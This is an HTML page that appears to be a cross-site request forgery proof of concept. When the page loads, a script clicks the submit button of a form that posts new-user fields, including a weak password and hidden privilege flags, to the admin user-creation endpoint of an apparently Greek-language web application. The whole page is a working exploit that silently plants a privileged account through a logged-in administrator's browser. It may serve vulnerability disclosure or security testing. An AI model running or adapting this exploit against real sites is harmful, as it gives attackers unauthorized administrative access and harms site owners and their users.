<body onload='boomboom()'>
<form method="POST" action="http://localhost:1180/modules/admin/newuseradmin.php">

<td><input class='FormData_InputText' type='text' name='nom_form' value='Last Name'></td>
<td><input class='FormData_InputText' type='text' name='prenom_form' value='Name'></td>
<td><input class='FormData_InputText' type='text' name='uname' value='Username'></td>
<td><input class='FormData_InputText' type='text' name='password' value='easy'></td>
<td><input class='FormData_InputText' type='text' name='email_form' value='random@random.com'></td>
<select name='department'  class='auth_input'>
	<option value='1'>Τμήμα 1</option>
</select>
<td><input class='FormData_InputText' type='text' name='comment' value='Hello'></td>
<select name='language'  class='auth_input'>
	<option value='el'>Ελληνικά</option>
</select>
<td><input type='submit' name='submit' id="boom" value='Υποβολή' ></td>
<td><input type='hidden' name='rid' value=''></td>
<td><input type='hidden' name='pstatut' value='1'></td>
<td><input type='hidden' name='auth' value='1' ></td>




<script type="text/javascript">
      function boomboom() {
        document.getElementById("boom").click();
      }
</script>